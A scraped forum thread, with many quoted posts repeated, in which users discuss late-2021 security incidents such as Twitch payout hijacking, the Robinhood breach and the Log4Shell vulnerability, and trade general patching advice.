“Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.
In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.
To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period- and nothing you submitted to Twitch is safe at this point.
“Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.
In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.
To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period- and nothing you submitted to Twitch is safe at this point.
There are other plausible reasons. Perhaps they have some malware on their devices that steals session cookies or whatever equivalent, which would render password changing/two factor useless.
“Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.
In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.
To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period- and nothing you submitted to Twitch is safe at this point.
Do Twitch do business in the EU? Because my GDPR senses are tingling! This is definitely a GDPR 4 breach and they have not effectively remedied it.
+3
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
Given the extent of the breach, and what was taken from Twitch, the only safe move is to assume that the entire site is compromised.
I would presume that this won't be the last we hear about an event like this.
Robinhood said Monday that the popular trading app suffered a security breach last week where hackers accessed some personal information of roughly 7 million users then demanded a ransom payment.
The online trading platform said it believes no Social Security numbers, bank account numbers or debit-card numbers were exposed and that customers have seen no financial losses because of the intrusion.
The company on Twitter said the "attack has been contained."
Pretty much they’re claiming the only thing the hackers got on most of those people are real names or email addresses… but honestly I’d still lock everything down. I think there’s another shoe to fall here.
Second, on November 2 we received a report to our security bug bounty program of a vulnerability that would allow an attacker to publish new versions of any npm package using an account without proper authorization. We quickly validated the report, began our incident response processes, and patched the vulnerability within six hours of receiving the report.
So this was buried 9 paragraphs deep in a GitHub blog about their commitment to npm security. They claim there's no indication of it being used but they only have telemetry back to September 2020
Lol, Apple flagged my Discord password as compromised. Did they have a breach I missed?
Probably not, instead your password probably matched the hash of a password that is in a database of passwords that have been compromised. You should probably change it.
+3
Options
OrcaAlso known as EspressosaurusWrexRegistered Userregular
Lol, Apple flagged my Discord password as compromised. Did they have a breach I missed?
Probably not, instead your password probably matched the hash of a password that is in a database of passwords that have been compromised. You should probably change it.
Already done, but I'm surprised to see it matched.
Not sure if this is the best place to ask but it is semi-security related. Is there a way to circumvent the “Can’t connect securely to this page” web browser message resulting from a site using outdated TLS settings?
I know it isn’t ideal, but I get it occasionally at work when trying to visit government sites that I need access to.
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
edited December 2021
I am not a netsec expert, but there is an emerging situation currently wherein a remote code execution vulnerability has been found in Log4j, a ubiquitous logging utility that is present in a wide range of software. The impact of this vulnerability is likely to be far reaching, particularly into web apps that have been long forgotten.
Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability, and exploit code was discovered posted online.
“The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,” HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.”
Reports are already surfacing of servers performing Internet-wide scans in attempts to locate vulnerable servers.
Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits of the same high severity as those threatening Minecraft users.
So, I'm not sure exactly how this isn't fiction but: A Java bug originally discovered in Minecraft has been exploited to hack a wide variety of web-facing applications, likely including smart TVs and fridges, and is being leveraged to mine cryptocurrency.
“The internet’s on fire right now,” said Adam Meyers, senior vice-president of intelligence at the cybersecurity firm Crowdstrike. “People are scrambling to patch”, he said, “and all kinds of people scrambling to exploit it.” He said on Friday morning that in the 12 hours since the bug’s existence was disclosed, it had been “fully weaponized”, meaning malefactors had developed and distributed tools to exploit it.
The flaw, dubbed “Log4Shell”, may be the worst computer vulnerability discovered in years. It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across the industry and the government. Unless it is fixed, it grants criminals, spies and programming novices alike, easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.
...
Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” – and possibly the biggest in the history of modern computing.
The vulnerability was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.
Experts said the extreme ease with which the vulnerability lets an attacker access a web server – no password required – is what makes it so dangerous.
So what sort of thing uses this log4 code? Like is this buried in my Steam account/client somewhere? Etc.
From what I was reading on Reddit, it's basically everywhere. The library is pretty ubiquitous, and it's really just a matter of luck on whether any particular server used it.
Gamertag: KL Retribution
PSN:Furlion
+2
Options
TetraNitroCubaneThe DjinneratorAt the bottom of a bottleRegistered Userregular
So what sort of thing uses this log4 code? Like is this buried in my Steam account/client somewhere? Etc.
From what I was reading on Reddit, it's basically everywhere. The library is pretty ubiquitous, and it's really just a matter of luck on whether any particular server used it.
Log4J is ubiquitous in Java. If you need logging, chances are Log4J is where you'll look first unless you have special needs.
At this point, I'm afraid to run any Java app that talks to the internet on my local machine because my money is on it using log4j.
So what would be the fix for this? Is it something each individual platform will need to address separately?
Yep, each affected app needs to update its dependencies. Seems to only affect v2 of the library as well, so a lot of older/corporate apps have escaped.
Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:
Updated my unifi controller this morning, think that's everything we have that we host. Everything else like Connectwise is hosted by them so uh, get to patchin' bitches.
So what would be the fix for this? Is it something each individual platform will need to address separately?
Yep, each affected app needs to update its dependencies. Seems to only affect v2 of the library as well, so a lot of older/corporate apps have escaped.
Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:
Apparently, the V1 is EOL so you're fucked with that and need to upgrade to V2
Found some instances, Ms sql for our Dynamocs installs had it but no Java install so it appears to just an included plug in. Dell supportassist enterprise which is upgrading now to some new product right now.
1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?
2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?
3) How worried should we users be about getting our stuff hacked because of this?
1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?
2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?
3) How worried should we users be about getting our stuff hacked because of this?
1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.
2) It is possible for some one to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.
3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransom ware, and lockdown the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.
1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?
2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?
3) How worried should we users be about getting our stuff hacked because of this?
1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.
2) It is possible for some one to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.
3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransom ware, and lockdown the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.
Well, that's just wonderful. Not mad about it, not anxious, just...
I'm kind of staggered that something like this could still have happened, in this day and age. It's like the perfect storm of vulnerabilities- it's easy to utilize, it's in pretty much fucking everything, and stopping it requires the IT people of pretty much everything to be able to find and install a patch or new version of this Java stuff by app/server/etc... and of course there's also a lot of stuff that's never going to get updated because people are lazy or it's active but no longer supported... and then of course there's an onus on users to install the patches for the stuff they have to serverside.
I'm just lucky I don't play Minecraft, I suppose. But god, all those poor IT people running on zero sleep and having to deal with and patch this and then deal with Patch Tuesday... I feel for them all. It's got to be hell for them.
I got what I needed to done, so I'm just going to take it easy till Monday, I think. Let another 24-36 hours go for more patches to be pushed and hoping the patches beat the exploiters and this doesn't erupt into something much worse.
Yeah, so we were real busy at work yesterday. We all missed the news on this stuff. I read about while going to bed last night. Alerted the rest of the team. I was out of the house all day today. Still crickets from the team, so when I got home I went actively searching our systems, pinged the team/my boss and...was told we should just make a post about it and send out an email to let users update their own stuff.
Posts
Twitch streamers are getting their payments from the site stolen.
“Someone has gained access to my account, changed my pay-out from wire to PayPal and added their own PayPal,” Dakillzor explained.
In a response to xSophieSophie, Twitch said “there is no recourse to reverse this transaction.” They also advised creating a new password and ensuring that two-factor authentication (2FA) is up to date. The streamer says 2FA was enabled, and still is, yet the payment method is still being changed.
To me, this says they have a backdoor into the system somewhere, with administrator-level access to everything. The only way anybody’s going to trust them is to nuke the entirety of Twitch from orbit and rebuild it from scratch. At this point, I’d just go full red-alert and assume that everything was compromised, period- and nothing you submitted to Twitch is safe at this point.
I can has cheezburger, yes?
There are other plausible reasons. Perhaps they have some malware on their devices that steals session cookies or whatever equivalent, which would render password changing/two factor useless.
Do Twitch do business in the EU? Because my GDPR senses are tingling! This is definitely a GDPR 4 breach and they have not effectively remedied it.
I would presume that this won't be the last we hear about an event like this.
Robinhood breached; 7 million people affected
Robinhood said Monday that the popular trading app suffered a security breach last week where hackers accessed some personal information of roughly 7 million users then demanded a ransom payment.
The online trading platform said it believes no Social Security numbers, bank account numbers or debit-card numbers were exposed and that customers have seen no financial losses because of the intrusion.
The company on Twitter said the "attack has been contained."
Pretty much they’re claiming the only thing the hackers got on most of those people are real names or email addresses… but honestly I’d still lock everything down. I think there’s another shoe to fall here.
I can has cheezburger, yes?
So this was buried 9 paragraphs deep in a GitHub blog about their commitment to npm security. They claim there's no indication of it being used but they only have telemetry back to September 2020
https://www.cisecurity.org/advisory/a-vulnerability-in-multiple-netgear-products-could-allow-for-arbitrary-code-execution_2021-148/
Probably not, instead your password probably matched the hash of a password that is in a database of passwords that have been compromised. You should probably change it.
Already done, but I'm surprised to see it matched.
I know it isn’t ideal, but I get it occasionally at work when trying to visit government sites that I need access to.
One of the already deployed payloads?
So, I'm not sure exactly how this isn't fiction but: A Java bug originally discovered in Minecraft has been exploited to hack a wide variety of web-facing applications, likely including smart TVs and fridges, and is being leveraged to mine cryptocurrency.
Steam | XBL
Nintendo Network ID: AzraelRose
DropBox invite link - get 500MB extra free.
From what I was reading on Reddit, it's basically everywhere. The library is pretty ubiquitous, and it's really just a matter of luck on whether any particular server used it.
PSN:Furlion
We're going to be seeing some major fallout from this, right quick.
Log4J is ubiquitous in Java. If you need logging, chances are Log4J is where you'll look first unless you have special needs.
At this point, I'm afraid to run any Java app that talks to the internet on my local machine because my money is on it using log4j.
Edit: d'oh, I'm super late.
Yep, each affected app needs to update its dependencies. Seems to only affect v2 of the library as well, so a lot of older/corporate apps have escaped.
Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:
https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/
Apparently, the V1 is EOL so you're fucked with that and need to upgrade to V2
So, you know, that's cool.
Since when has that ever mattered in the enterprise?
RIP Mostly Harmless, they were mostly harmless
1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?
2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?
3) How worried should we users be about getting our stuff hacked because of this?
I can has cheezburger, yes?
1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.
2) It is possible for some one to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.
3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransom ware, and lockdown the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.
PSN:Furlion
Well, that's just wonderful. Not mad about it, not anxious, just...
I'm kind of staggered that something like this could still have happened, in this day and age. It's like the perfect storm of vulnerabilities- it's easy to utilize, it's in pretty much fucking everything, and stopping it requires the IT people of pretty much everything to be able to find and install a patch or new version of this Java stuff by app/server/etc... and of course there's also a lot of stuff that's never going to get updated because people are lazy or it's active but no longer supported... and then of course there's an onus on users to install the patches for the stuff they have to serverside.
I'm just lucky I don't play Minecraft, I suppose. But god, all those poor IT people running on zero sleep and having to deal with and patch this and then deal with Patch Tuesday... I feel for them all. It's got to be hell for them.
I got what I needed to done, so I'm just going to take it easy till Monday, I think. Let another 24-36 hours go for more patches to be pushed and hoping the patches beat the exploiters and this doesn't erupt into something much worse.
I can has cheezburger, yes?
Not feeling great about this!